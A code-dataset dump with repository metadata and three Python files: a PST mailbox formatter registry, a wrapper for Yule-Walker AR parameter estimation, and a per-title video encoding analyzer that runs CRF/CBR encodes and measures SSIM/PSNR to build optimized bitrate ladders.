hexsha stringlengths 40 40 | size int64 1 1.03M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 3 239 | max_stars_repo_name stringlengths 5 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 239 | max_issues_repo_name stringlengths 5 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 239 | max_forks_repo_name stringlengths 5 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.03M | avg_line_length float64 1 958k | max_line_length int64 1 1.03M | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
79544e8236b19db6b0a905707350074ea5a84957 | 3,936 | py | Python | pst-parser/pstformatters.py | stavinski/pst-parser | d542fe338caa1d19a77d48308abea59a0dd80576 | [
"MIT"
] | 3 | 2019-11-06T23:22:03.000Z | 2021-03-15T21:42:34.000Z | pst-parser/pstformatters.py | stavinski/pst-parser | d542fe338caa1d19a77d48308abea59a0dd80576 | [
"MIT"
] | 2 | 2017-05-02T08:19:33.000Z | 2017-05-04T12:15:06.000Z | pst-parser/pstformatters.py | stavinski/pst-parser | d542fe338caa1d19a77d48308abea59a0dd80576 | [
"MIT"
] | null | null | null |
import csv
import sys
# Registry of formatter classes, keyed by their ``name`` class attribute.
# It is populated automatically by PSTFormatterMeta whenever a PSTFormatter
# subclass is defined.
formatters = {}
def available_formatters():
    """Return the names of all registered formatters.

    Returns:
        list: a snapshot of the registered formatter names, safe to
        iterate or mutate without affecting the registry.
    """
    # list() gives a stable snapshot (and the same concrete type on
    # both Python 2 and Python 3, unlike dict.keys()).
    return list(formatters)
def from_name(name="screen", output=sys.stdout, args=None):
    """Instantiate the formatter registered under *name*.

    Args:
        - name (str): the registry key of the formatter to build
        - output (file): destination stream the formatter will write to
        - args: optional parsed command-line arguments, forwarded as-is

    Returns:
        a PSTFormatter implementation instance
    """
    formatter_cls = formatters[name]
    return formatter_cls(output=output, args=args)
class PSTFormatterMeta(type):
    """Metaclass for PSTFormatter subclasses.

    Validates that every concrete subclass declares a ``name`` class
    attribute, and auto-registers the subclass in the module-level
    ``formatters`` dict under that name so ``from_name`` can find it.
    """
    @staticmethod
    def _name_defined(name, fields):
        """Raise ValueError when the class dict lacks a ``name`` attribute."""
        # idiomatic membership test ("name" not in) instead of "not ... in"
        if "name" not in fields:
            raise ValueError("name not defined in %s" % name)
    @staticmethod
    def _register_formatter(name, cls):
        """Expose *cls* to from_name() lookups under *name*."""
        formatters[name] = cls
    def __new__(meta, name, bases, class_dict):
        cls = type.__new__(meta, name, bases, class_dict)
        # The abstract base class itself is neither validated nor registered.
        if name == "PSTFormatter":
            return cls
        PSTFormatterMeta._name_defined(name, class_dict)
        PSTFormatterMeta._register_formatter(class_dict["name"], cls)
        return cls
class PSTFormatter(object):
    """Abstract base class that every output formatter derives from."""
    # Hooking in the metaclass auto-registers each concrete subclass
    # (Python 2 style metaclass declaration).
    __metaclass__ = PSTFormatterMeta
    # Registry key; concrete subclasses must override this.
    name = None
    def __init__(self, output=None, args=None):
        """Store the destination stream and optional CLI arguments."""
        assert output is not None, "output must be provided"
        self._args = args
        self._output = output
    def format_folder(self, path, folder):
        """Render one folder entry; concrete subclasses must implement this."""
        raise NotImplementedError()
    def format_message(self, message):
        """Render one message entry; concrete subclasses must implement this."""
        raise NotImplementedError()
class PSTScreenFormatter(PSTFormatter):
    """formats output for screen"""
    # registry key used by from_name() to select this formatter
    name = "screen"
    def __init__(self, output, args):
        # delegates stream/args storage to the base class
        super(PSTScreenFormatter, self).__init__(output, args)
    def format_folder(self, path, folder):
        # Write a human readable summary of one folder followed by the list
        # of its direct sub folders (Python 2 ``print >> file`` syntax).
        formatted_path = "root" if path is None else "/".join(map(str, path))
        print >> self._output, "Path: %s" % formatted_path
        print >> self._output, "ID: %s" % folder.identifier
        print >> self._output, "Name: %s" % folder.name
        print >> self._output, "No. of sub folders: %d" % folder.number_of_sub_folders
        print >> self._output, "No. of messages: %d" % folder.number_of_messages
        if folder.has_sub_folders:
            print >> self._output, "Sub folders:"
            for sub_folder in folder.get_folders_iter():
                # root-level folders carry no parent path prefix
                if path is None:
                    print >> self._output, "%d: %s" % (sub_folder.index, sub_folder.name)
                else:
                    print >> self._output, "%s/%d: %s" % (formatted_path, sub_folder.index, sub_folder.name)
    def format_message(self, message):
        # Write one message summary; the trailing comma keeps the index on
        # the same output line as the dashed separator that follows.
        print >> self._output, "%d:" % message.index,
        print >> self._output, "-" * 80
        print >> self._output, "%s" % message.subject
        print >> self._output, "Sender: %s" % message.sender
        print >> self._output, "No. of attachments: %d" % message.number_of_attachments
        # message bodies are only emitted when requested via the CLI flags
        if self._args.include_plaintext:
            print >> self._output, "Plaintext:"
            print >> self._output, message.plain_text
        if self._args.include_html:
            print >> self._output, "HTML:"
            print >> self._output, message.html
class PSTCSVFormatter(PSTFormatter):
    """formats output into csv"""
    # registry key used by from_name() to select this formatter
    name = "csv"
    def __init__(self, output=None, args=None):
        # delegates stream/args storage to the base class
        super(PSTCSVFormatter, self).__init__(output, args)
    def format_folder(self, path, folder):
        # TODO: CSV folder output is not implemented yet (intentional stub)
        pass
    def format_message(self, message):
        # TODO: CSV message output is not implemented yet (intentional stub)
        pass
| 30.75 | 108 | 0.607978 |
79544e8906f7c735e6b8bcc9ae69db560a1bb415 | 4,162 | py | Python | src/aryule.py | vishalbelsare/parametric_modeling | 9bfe5df35671930043215c8f6c855af8f49e28bf | [
"BSD-3-Clause"
] | 37 | 2015-02-01T12:03:48.000Z | 2021-12-23T14:38:38.000Z | src/aryule.py | vishalbelsare/parametric_modeling | 9bfe5df35671930043215c8f6c855af8f49e28bf | [
"BSD-3-Clause"
] | 2 | 2015-07-27T11:34:24.000Z | 2019-12-11T13:39:18.000Z | src/aryule.py | vishalbelsare/parametric_modeling | 9bfe5df35671930043215c8f6c855af8f49e28bf | [
"BSD-3-Clause"
] | 19 | 2016-09-06T20:23:19.000Z | 2021-11-07T16:07:40.000Z | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Created on Jan 22 20:38 2014
@author: Sammy Pfeiffer
@email: sammypfeiffer@gmail.com
This file pretends to imitate the behaviour of the MATLAB function aryule
Using spectrum implementation:
http://thomas-cokelaer.info/software/spectrum/html/user/ref_param.html#spectrum.yulewalker.aryule
"""
import numpy as np
import spectrum
def aryule(x, p):
    """Estimate AR model parameters with the Yule-Walker method.

    Mirrors MATLAB's ``aryule(X, ORDER)`` by delegating to
    ``spectrum.aryule`` and prepending the leading 1.0 coefficient that
    MATLAB includes in the returned polynomial.

    :param x: input signal samples
    :param p: order of the autoregressive model to fit (integer)
    :return: tuple ``(A, E, K)`` where ``A`` holds the AR polynomial
        coefficients with a leading 1.0, ``E`` is the white noise
        variance estimate (final prediction error) and ``K`` holds the
        reflection coefficients for use in a lattice filter.
    """
    coeffs, noise_variance, reflection = spectrum.aryule(x, p)
    # MATLAB returns the full polynomial, so prepend the implicit 1.0.
    polynomial = np.hstack((1, coeffs))
    return polynomial, noise_variance, reflection
# Local Variables: a, e, k, nx, p, R, x, mx
# Function calls: aryule, nargchk, min, issparse, nargin, length, isempty, error, levinson, message, xcorr, round, size
#%ARYULE AR parameter estimation via Yule-Walker method.
#% A = ARYULE(X,ORDER) returns the polynomial A corresponding to the AR
#% parametric signal model estimate of vector X using the Yule-Walker
#% (autocorrelation) method. ORDER is the model order of the AR system.
#% This method solves the Yule-Walker equations by means of the Levinson-
#% Durbin recursion.
#%
#% [A,E] = ARYULE(...) returns the final prediction error E (the variance
#% estimate of the white noise input to the AR model).
#%
#% [A,E,K] = ARYULE(...) returns the vector K of reflection coefficients.
#%
#% % Example:
#% % Estimate model order using decay of reflection coefficients.
#%
#% rng default;
#% y=filter(1,[1 -0.75 0.5],0.2*randn(1024,1));
#%
#% % Create AR(2) process
#% [ar_coeffs,NoiseVariance,reflect_coeffs]=aryule(y,10);
#%
#% % Fit AR(10) model
#% stem(reflect_coeffs); axis([-0.05 10.5 -1 1]);
#% title('Reflection Coefficients by Lag'); xlabel('Lag');
#% ylabel('Reflection Coefficent');
#%
#% See also PYULEAR, ARMCOV, ARBURG, ARCOV, LPC, PRONY.
#% Ref: S. Orfanidis, OPTIMUM SIGNAL PROCESSING, 2nd Ed.
#% Macmillan, 1988, Chapter 5
#% M. Hayes, STATISTICAL DIGITAL SIGNAL PROCESSING AND MODELING,
#% John Wiley & Sons, 1996, Chapter 8
#% Author(s): R. Losada
#% Copyright 1988-2004 The MathWorks, Inc.
#% $Revision: 1.12.4.6 $ $Date: 2012/10/29 19:30:38 $
# matcompat.error(nargchk(2., 2., nargin, 'struct'))
# #% Check the input data type. Single precision is not supported.
# #%try
# #% chkinputdatatype(x,p);
# #%catch ME
# #% throwAsCaller(ME);
# #%end
# [mx, nx] = matcompat.size(x)
# if isempty(x) or length(x)<p or matcompat.max(mx, nx) > 1.:
# matcompat.error(message('signal:aryule:InvalidDimensions'))
# elif isempty(p) or not p == np.round(p):
# matcompat.error(message('signal:aryule:MustBeInteger'))
#
#
# if issparse(x):
# matcompat.error(message('signal:aryule:Sparse'))
#
#
# R = plt.xcorr(x, p, 'biased')
# [a, e, k] = levinson(R[int(p+1.)-1:], p)
# return [a, e, k] | 40.019231 | 123 | 0.617972 |
79544eba54ebe1c56e3a007c39f9a1886b197d32 | 25,701 | py | Python | per_title_analysis/per_title_analysis.py | thomMar/per-title-analysis | f87ab1af65f429723df6c74ef22095a1882348e0 | [
"MIT"
] | null | null | null | per_title_analysis/per_title_analysis.py | thomMar/per-title-analysis | f87ab1af65f429723df6c74ef22095a1882348e0 | [
"MIT"
] | null | null | null | per_title_analysis/per_title_analysis.py | thomMar/per-title-analysis | f87ab1af65f429723df6c74ef22095a1882348e0 | [
"MIT"
] | 4 | 2018-08-31T08:41:40.000Z | 2020-05-21T09:04:09.000Z | # -*- coding: utf-8 -*-
#importation
from __future__ import division
from pylab import *
import sys
import os
import json
import datetime
import statistics
import matplotlib.pyplot as plt
import matplotlib.animation as animation
from task_providers import Probe, CrfEncode, CbrEncode, Metric
class EncodingProfile(object):
    """This class defines an encoding profile"""

    def __init__(self, width, height, bitrate_default, bitrate_min, bitrate_max, required, bitrate_steps_individual):
        """EncodingProfile initialization

        :param width: Video profile width
        :type width: int
        :param height: Video profile height
        :type height: int
        :param bitrate_default: Video profile bitrate default (in bits per second)
        :type bitrate_default: int
        :param bitrate_min: Video profile bitrate min constraint (in bits per second)
        :type bitrate_min: int
        :param bitrate_max: Video profile bitrate max constraint (in bits per second)
        :type bitrate_max: int
        :param required: The video profile is required and cannot be removed from the optimized encoding ladder
        :type required: bool
        :param bitrate_steps_individual: Step Bitrate Range defined for each Video profile (in bits per second)
        :type bitrate_steps_individual: int
        :raises ValueError: if width, height or bitrate_default is None
        """
        if width is None:
            raise ValueError('The EncodingProfile.width value is required')
        self.width = int(width)
        if height is None:
            raise ValueError('The EncodingProfile.height value is required')
        self.height = int(height)
        if bitrate_default is None:
            raise ValueError('The EncodingProfile.bitrate_default value is required')
        self.bitrate_default = int(bitrate_default)
        # The min/max constraints are clamped so they never cross the default bitrate.
        self.bitrate_min = min(int(bitrate_min), self.bitrate_default)
        self.bitrate_max = max(int(bitrate_max), self.bitrate_default)
        self.bitrate_steps_individual = None if bitrate_steps_individual is None else int(bitrate_steps_individual)
        # A profile is required unless the caller explicitly says otherwise.
        self.required = True if required is None else required
        # Computed later by set_bitrate_factor(), once the ladder's max bitrate is known.
        self.bitrate_factor = None

    def __str__(self):
        """Display the encoding profile informations

        :return: human readable string describing an encoding profil object
        :rtype: str
        """
        # Fixed: the original format string was missing the '=' after
        # bitrate_steps_individual, producing e.g. "bitrate_steps_individual150000".
        return "{}x{}, bitrate_default={}, bitrate_min={}, bitrate_max={}, bitrate_steps_individual={}, bitrate_factor={}, required={}".format(self.width, self.height, self.bitrate_default, self.bitrate_min, self.bitrate_max, self.bitrate_steps_individual, self.bitrate_factor, self.required)

    def get_json(self):
        """Return object details in json

        :return: json object describing the encoding profile and the configured constraints
        :rtype: str
        """
        profile = {}
        profile['width'] = self.width
        profile['height'] = self.height
        profile['bitrate'] = self.bitrate_default
        profile['constraints'] = {}
        profile['constraints']['bitrate_min'] = self.bitrate_min
        profile['constraints']['bitrate_max'] = self.bitrate_max
        profile['constraints']['bitrate_factor'] = self.bitrate_factor
        profile['constraints']['required'] = self.required
        return json.dumps(profile)

    def set_bitrate_factor(self, ladder_max_bitrate):
        """Set the bitrate factor from the max bitrate in the encoding ladder

        :param ladder_max_bitrate: highest default bitrate of the ladder (bits per second)
        :type ladder_max_bitrate: int
        """
        self.bitrate_factor = ladder_max_bitrate/self.bitrate_default
class EncodingLadder(object):
    """This class defines an over-the-top encoding ladder template"""

    def __init__(self, encoding_profile_list):
        """Build the ladder and derive each profile's bitrate factor.

        :param encoding_profile_list: A list of multiple encoding profiles
        :type encoding_profile_list: per_title.EncodingProfile[]
        """
        self.encoding_profile_list = encoding_profile_list
        self.calculate_bitrate_factors()

    def __str__(self):
        """Human readable description of the encoding ladder template.

        :rtype: str
        """
        lines = ["{} encoding profiles\n".format(len(self.encoding_profile_list))]
        lines.extend(str(profile) + "\n" for profile in self.encoding_profile_list)
        return "".join(lines)

    def get_json(self):
        """Return the encoding ladder template as a json string.

        :rtype: str
        """
        ladder = {
            'overall_bitrate_ladder': self.get_overall_bitrate(),
            'encoding_profiles': [json.loads(profile.get_json()) for profile in self.encoding_profile_list],
        }
        return json.dumps(ladder)

    def get_max_bitrate(self):
        """Return the highest default bitrate in the ladder (0 when empty).

        :rtype: int
        """
        return max((profile.bitrate_default for profile in self.encoding_profile_list), default=0)

    def get_overall_bitrate(self):
        """Return the sum of all profile default bitrates in the ladder.

        :rtype: int
        """
        return sum(profile.bitrate_default for profile in self.encoding_profile_list)

    def calculate_bitrate_factors(self):
        """Propagate the ladder's max bitrate into every profile's factor."""
        top_bitrate = self.get_max_bitrate()
        for profile in self.encoding_profile_list:
            profile.set_bitrate_factor(top_bitrate)
class Analyzer(object):
    """This class defines a Per-Title Analyzer"""

    def __init__(self, input_file_path, encoding_ladder):
        """Analyzer initialization

        :param input_file_path: The input video file path
        :type input_file_path: str
        :param encoding_ladder: An EncodingLadder object
        :type encoding_ladder: per_title.EncodingLadder
        """
        self.input_file_path = input_file_path
        self.encoding_ladder = encoding_ladder
        # Analysis results, filled in by subclasses during process().
        self.average_bitrate = None
        self.standard_deviation = None
        self.optimal_bitrate = None
        self.peak_bitrate = None
        # Skeleton of the json report shared by all analyzer implementations.
        self.json = {
            'input_file_path': self.input_file_path,
            'template_encoding_ladder': json.loads(self.encoding_ladder.get_json()),
            'analyses': [],
        }

    def __str__(self):
        """Human readable description of the analyzer configuration.

        :rtype: str
        """
        header = "Per-Title Analysis for: {}\n".format(self.input_file_path)
        return header + str(self.encoding_ladder)

    def get_json(self):
        """Return the inputs configuration and output analyses as json.

        :rtype: str
        """
        return json.dumps(self.json, indent=4, sort_keys=True)
class CrfAnalyzer(Analyzer):
    """This class defines a Per-Title Analyzer based on calculating the top bitrate wit CRF, then deducting the ladder"""

    def set_bitrate(self, number_of_parts):
        """In linear mode, optimal_bitrates are defined from the first analysis thanks to the bitrate_factor
        : print results in linear mode for CRF analyzer

        :param number_of_parts: number of analysed parts (printed for reporting only)
        :type number_of_parts: int
        """
        overall_bitrate_optimal = 0
        for encoding_profile in self.encoding_ladder.encoding_profile_list:
            # Derive this profile's bitrate from the ladder-wide optimum.
            target_bitrate = int(self.optimal_bitrate/encoding_profile.bitrate_factor)
            remove_profile = False
            # Optional profiles falling below their floor are dropped entirely.
            if target_bitrate < encoding_profile.bitrate_min and encoding_profile.required is False:
                remove_profile = True
            # Clamp the target into the profile's configured constraints.
            if target_bitrate < encoding_profile.bitrate_min:
                target_bitrate = encoding_profile.bitrate_min
            if target_bitrate > encoding_profile.bitrate_max:
                target_bitrate = encoding_profile.bitrate_max
            if remove_profile is False:
                overall_bitrate_optimal += target_bitrate
                print(' ',encoding_profile.width,'x',encoding_profile.height,' ',target_bitrate*1e-3,'kbps linear',' / nbr part:',number_of_parts,' ')

    def process(self, number_of_parts, width, height, crf_value, idr_interval, model):
        """Do the necessary crf encodings and assessments

        :param number_of_parts: Number of part/segment for the analysis
        :type number_of_parts: int
        :param width: Width of the CRF encode
        :type width: int
        :param height: Height of the CRF encode
        :type height: int
        :param crf_value: Constant Rate Factor: this is a constant quality factor, see ffmpeg.org for more documentation on this parameter
        :type crf_value: int
        :param idr_interval: IDR interval in seconds
        :type idr_interval: int
        :param model: linear (True) or for each (False)
        :type model: bool
        """
        # Start by probing the input video file
        input_probe = Probe(self.input_file_path)
        input_probe.execute()
        crf_bitrate_list = []
        part_duration = input_probe.duration/number_of_parts
        # An IDR frame is a special I-frame: no frame after it may reference
        # any frame before it, which makes seeking easier. With an IDR every
        # idr_interval seconds, the frame distance is interval * framerate.
        idr_interval_frames = idr_interval*input_probe.framerate
        # Start Analysis
        for i in range(0, number_of_parts):
            part_start_time = i*part_duration  # select the extract to encode
            # Do a CRF encode for the input file
            crf_encode = CrfEncode(self.input_file_path, width, height, crf_value, idr_interval_frames, part_start_time, part_duration)
            crf_encode.execute()
            # Get the Bitrate from the CRF encoded file
            crf_probe = Probe(crf_encode.output_file_path)
            crf_probe.execute()
            # Remove temporary CRF encoded file
            os.remove(crf_encode.output_file_path)
            # Set the crf bitrate
            crf_bitrate_list.append(crf_probe.bitrate)
        # Calculate the average bitrate for all CRF encodings
        self.average_bitrate = statistics.mean(crf_bitrate_list)
        self.peak_bitrate = max(crf_bitrate_list)
        if number_of_parts > 1:
            # Calculate the standard deviation of crf bitrate values
            self.standard_deviation = statistics.stdev(crf_bitrate_list)
            weighted_bitrate_sum = 0
            weighted_bitrate_len = 0
            # Giving weight for each bitrate based on the standard deviation
            for bitrate in crf_bitrate_list:
                if bitrate > (self.average_bitrate + self.standard_deviation):
                    weight = 4
                elif bitrate > (self.average_bitrate + self.standard_deviation/2):
                    weight = 2
                elif bitrate < (self.average_bitrate - self.standard_deviation/2):
                    weight = 0.5
                elif bitrate < (self.average_bitrate - self.standard_deviation):
                    weight = 0
                else:
                    weight = 1
                weighted_bitrate_sum += weight*bitrate
                weighted_bitrate_len += weight
            # Set the optimal bitrate from the weighted bitrate of all crf encoded parts
            self.optimal_bitrate = weighted_bitrate_sum/weighted_bitrate_len
        else:
            # Set the optimal bitrate from the only one crf result
            self.optimal_bitrate = self.average_bitrate
        if not model:
            print(' ',width,'x',height,' ',self.optimal_bitrate*1e-3,'kbps encode_for_each','/ nbr part:',number_of_parts,' ')
        if model:
            # We calculate optimal bitrate of the the remaining profiles using bitrate factor
            self.set_bitrate(number_of_parts)
        # Adding results to json
        result = {}
        result['processing_date'] = str(datetime.datetime.now())
        result['parameters'] = {}
        result['parameters']['method'] = "CRF"
        result['parameters']['width'] = width
        result['parameters']['height'] = height
        result['parameters']['crf_value'] = crf_value
        result['parameters']['idr_interval'] = idr_interval
        result['parameters']['number_of_parts'] = number_of_parts
        result['parameters']['part_duration'] = part_duration
        result['bitrate'] = {}
        result['bitrate']['optimal'] = self.optimal_bitrate
        result['bitrate']['average'] = self.average_bitrate
        # BUG FIX: 'peak' was previously assigned self.average_bitrate.
        result['bitrate']['peak'] = self.peak_bitrate
        result['bitrate']['standard_deviation'] = self.standard_deviation
        result['optimized_encoding_ladder'] = {}
        # BUG FIX: model is a bool (see docstring); the original compared it
        # against the strings "True"/"False", so this field was never set.
        if model:
            result['optimized_encoding_ladder']['model'] = "linear"
        else:
            result['optimized_encoding_ladder']['model'] = "encode_for_each"
        self.json['analyses'].append(result)
class MetricAnalyzer(Analyzer):
    """This class defines a Per-Title Analyzer based on VQ Metric and Multiple bitrate encodes"""
    def process(self, metric, limit_metric, bitrate_steps_by_default, idr_interval, steps_individual_bitrate_required):
        """Do the necessary encodings and quality metric assessments
        :param metric: Supporting "ssim" or "psnr"
        :type metric: string
        :param limit_metric: limit value of "ssim" or "psnr" use to find optimal bitrate
        :type limit_metric: int
        :param bitrate_steps_by_default: Bitrate gap between every encoding, only use if steps_individual_bitrate_required is False
        :type bitrate_steps_by_default: int
        :param idr_interval: IDR interval in seconds
        :type idr_interval: int
        :param steps_individual_bitrate_required: The step is the same for each profile and cannot be set individually if False
        :type steps_individual_bitrate_required: bool
        """
        # Start by probing the input video file
        input_probe = Probe(self.input_file_path)
        input_probe.execute()
        # The whole file is analysed as a single part (no segmentation here).
        part_start_time = 0
        part_duration = input_probe.duration
        idr_interval_frames = idr_interval*input_probe.framerate
        # normalise the metric name so 'SSIM ' and 'ssim' are equivalent
        metric = str(metric).strip().lower()
        #Create two lists for GRAPH 2
        optimal_bitrate_array = []
        default_bitrate_array = []
        print('\n********************************\n********Encoding Started********\n********************************\n')
        print('File Selected: ', os.path.basename(self.input_file_path))
        # Adding results to json
        # NOTE(review): json_ouput (sic) is built here but never appended to
        # self.json['analyses'], and the per-profile dicts below are never
        # added to its 'encoding_profiles' list — confirm intended behavior.
        json_ouput = {}
        json_ouput['processing_date'] = str(datetime.datetime.now())
        json_ouput['parameters'] = {}
        json_ouput['parameters']['method'] = "Metric"
        json_ouput['parameters']['metric'] = metric
        json_ouput['parameters']['bitrate_steps'] = bitrate_steps_by_default
        json_ouput['parameters']['idr_interval'] = idr_interval
        json_ouput['parameters']['number_of_parts'] = 1
        json_ouput['parameters']['part_duration'] = part_duration
        json_ouput['optimized_encoding_ladder'] = {}
        json_ouput['optimized_encoding_ladder']['encoding_profiles'] = []
        # Start Analysis
        for encoding_profile in self.encoding_ladder.encoding_profile_list:
            profile = {}
            profile['width'] = encoding_profile.width
            profile['height'] = encoding_profile.height
            profile['cbr_encodings'] = []
            profile['optimal_bitrate'] = None
            default_bitrate_array.append(encoding_profile.bitrate_default)
            # per-profile step overrides the global default when requested
            if steps_individual_bitrate_required:
                bitrate_steps_by_default = encoding_profile.bitrate_steps_individual
            print('\n\n __________________________________________')
            print(' The bitrate_step is: ',bitrate_steps_by_default*10**(-3),'kbps')
            print('\n |||',encoding_profile.width, 'x', encoding_profile.height,'|||\n')
            last_metric_value = 0
            last_quality_step_ratio = 0
            bitrate_array = []
            quality_array = []
            # Sweep the bitrate range of this profile, one CBR encode per step.
            for bitrate in range(encoding_profile.bitrate_min, (encoding_profile.bitrate_max + bitrate_steps_by_default), bitrate_steps_by_default):
                # Do a CBR encode for the input file
                cbr_encode = CbrEncode(self.input_file_path, encoding_profile.width, encoding_profile.height, bitrate, idr_interval_frames, part_start_time, part_duration)
                cbr_encode.execute()
                print('cbr_encode -> in progress -> ->')
                # Get the Bitrate from the CBR encoded file
                metric_assessment = Metric(metric, cbr_encode.output_file_path, self.input_file_path, input_probe.width, input_probe.height)
                metric_assessment.execute()
                print('-> -> probe |>', bitrate*10**(-3),'kbps |>',metric,' = ',metric_assessment.output_value, '\n')
                # Remove temporary CBR encoded file
                os.remove(cbr_encode.output_file_path)
                # OLD method to find optimal bitrate_min
                # if last_metric_value is 0 :
                #     # for first value, you cannot calculate acurate jump in quality from nothing
                #     last_metric_value = metric_assessment.output_value
                #     profile['optimal_bitrate'] = bitrate
                #     quality_step_ratio = (metric_assessment.output_value)/bitrate # first step from null to the starting bitrate
                # else:
                #     quality_step_ratio = (metric_assessment.output_value - last_metric_value)/bitrate_steps_by_default
                #
                # if quality_step_ratio >= (last_quality_step_ratio/2):
                #     profile['optimal_bitrate'] = bitrate
                # if 'ssim' in metric:
                #     if metric_assessment.output_value >= (last_metric_value + 0.01):
                #         profile['optimal_bitrate'] = bitrate
                # elif 'psnr' in metric:
                #     if metric_assessment.output_value > last_metric_value:
                #         profile['optimal_bitrate'] = bitrate
                # last_metric_value = metric_assessment.output_value
                # last_quality_step_ratio = quality_step_ratio
                # New method
                bitrate_array.append(bitrate) # All bitrate for one profile
                print(bitrate_array)
                quality_array.append(metric_assessment.output_value) # for one profile we collect every quality value
                print(quality_array)
            #**************GRAPH 1 matplotlib*************
            # Initialize
            diff_bitrate_array=1 # X
            diff_quality_array=0 # Y
            taux_accroissement=1
            #Curve
            # NOTE: figure/plot/etc. come from ``from pylab import *`` at module level
            figure(1)
            plot(bitrate_array, quality_array, label=str(encoding_profile.width)+'x'+str(encoding_profile.height))
            xlabel('bitrate (bps)')
            ylabel("quality: "+str(metric).upper())
            title(str(self.input_file_path))
            # Rate of change and find out the optimal bitrate in the array
            for j in range(0, len(quality_array)-1):
                diff_quality_array=quality_array[j+1]-quality_array[j]
                diff_bitrate_array=bitrate_array[j+1]-bitrate_array[j]
                #limited_evolution_metric=0.005 -> indication: set arround 0.1 for psnr with a 100000 bps bitrate step and 0.05 with a 50000 bitrate step for ssim
                limited_evolution_metric=limit_metric
                taux_accroissement = diff_quality_array/diff_bitrate_array
                encoding = {}
                encoding['bitrate'] = bitrate_array[j]
                encoding['metric_value'] = quality_array[j]
                encoding['quality_step_ratio'] = taux_accroissement
                profile['cbr_encodings'].append(encoding)
                # stop once the quality gain per extra bit drops below the threshold
                if taux_accroissement <= limited_evolution_metric/bitrate_steps_by_default:
                    #scatter(bitrate_array[j], quality_array[j]) # I found out the good point
                    break
            # Display good values !
            # NOTE(review): j and limited_evolution_metric leak out of the loop
            # above; if a profile yields fewer than 2 quality samples these
            # names would be undefined here — confirm inputs guarantee at
            # least two encodes per profile.
            print ('\nI found the best values for ||--- ', str(encoding_profile.width)+'x'+str(encoding_profile.height),' ---|| >> ',metric,':',quality_array[j],'| bitrate = ',bitrate_array[j]*10**(-3),'kbps')
            optimal_bitrate_array.append(bitrate_array[j]) # use in GRAPH 2
            profile['optimal_bitrate'] = bitrate_array[j]
            profile['bitrate_savings'] = encoding_profile.bitrate_default - profile['optimal_bitrate']
            # Graph annotations
            annotation=str(bitrate_array[j]*1e-3)+' kbps'
            #plot([bitrate_array[j],bitrate_array[j]], [0, quality_array[j]], linestyle='--' )
            annotate(annotation, xy=(bitrate_array[j], quality_array[j]), xycoords='data', xytext=(+1, +20), textcoords='offset points', fontsize=8, arrowprops=dict(arrowstyle="->", connectionstyle="arc,rad=0.2"))
            #plot([0, bitrate_array[j]], [quality_array[j], quality_array[j]], linestyle='--' )
            scatter(bitrate_array[j], quality_array[j], s=7)
            grid()
            legend()
            draw()
            show(block=False)
            pause(0.001)
        #save graph1 and plot graph2
        name=str(os.path.basename(self.input_file_path))
        input("\n\n\nPress [enter] to continue, This will close the graphic and save the figure as ''file_name_metric_limit_metric.png'' !")
        newpath = str(os.getcwd())+"/results/%s" % (name)
        #newpath = '/home/labo/Documents/per_title_analysis/results/%s' % (name)
        if not os.path.exists(newpath):
            os.makedirs(newpath)
        plt.savefig(newpath+"/%s-%s-%s-Per_Title.png" % (name, str(metric).strip().upper(), str(limited_evolution_metric)))
        # pair each profile's optimal bitrate with its static default for the chart
        bitrate_data = [list(i) for i in zip(optimal_bitrate_array, default_bitrate_array)]
        # GRAH 2 Computation
        figure(2)
        columns = ('Dynamic (kbps)', 'Fix (kbps)')
        # NOTE(review): row labels assume a fixed 5-profile ladder — confirm
        # they match the configured encoding ladder.
        rows = ['%s' % resolution for resolution in ('1920 x 1080', '1280 x 720', '960 x 540', '640 x 360', '480 x 270')]
        ylabel("bitrate (bps)")
        title(str(self.input_file_path))
        # Get some pastel shades for the colors
        colors = plt.cm.YlOrBr(np.linspace(0.35, 0.8, len(rows)))
        #size and positions
        n_rows = len(bitrate_data)-1
        index = np.arange(len(columns)) + 0.3
        bar_width = 0.5
        # Initialize the vertical-offset for the stacked bar chart.
        y_offset = np.zeros(len(columns))
        # Plot bars and create text labels for the table
        cell_text = []
        for row in range(n_rows+1): # until n_rows
            plt.bar(index, bitrate_data[n_rows-row], bar_width, bottom=y_offset, color=colors[row])
            y_offset = y_offset + bitrate_data[n_rows-row]
            print('this is y_offset',y_offset)
            cell_text.append(['%1.1f' % (x / 1000.0) for x in bitrate_data[n_rows-row]])
        # Reverse colors and text labels to display the last value at the top.
        colors = colors[::-1]
        cell_text.reverse()
        # Add a table at the bottom of the axes
        the_table = plt.table(cellText=cell_text,
                              rowLabels=rows,
                              rowColours=colors,
                              colLabels=columns,
                              loc='bottom')
        # Adjust layout to make room for the table:
        plt.subplots_adjust(left=0.5, bottom=0.2)
        #plt.ylabel("Loss in ${0}'s".format(value_increment))
        #plt.yticks(values * value_increment, ['%d' % val for val in values])
        plt.xticks([])
        #plt.title('Loss by Disaster')
        show(block=False)
        pause(0.001)
        print('\n\n->->\nloading graphic Histogram\n->->\n\n')
        input("Press [enter] to continue, This will close the graphic and save the figure as ''file_name_metric_limit_metric.png'' ")
        plt.savefig(newpath+"/%s-%s-%s-Per_Title_Histogram.png" % (name, str(metric).strip().upper(), str(limited_evolution_metric)))
        print('\n\n\n************ALL DONE********** !\n\n')
| 43.340641 | 291 | 0.63196 |
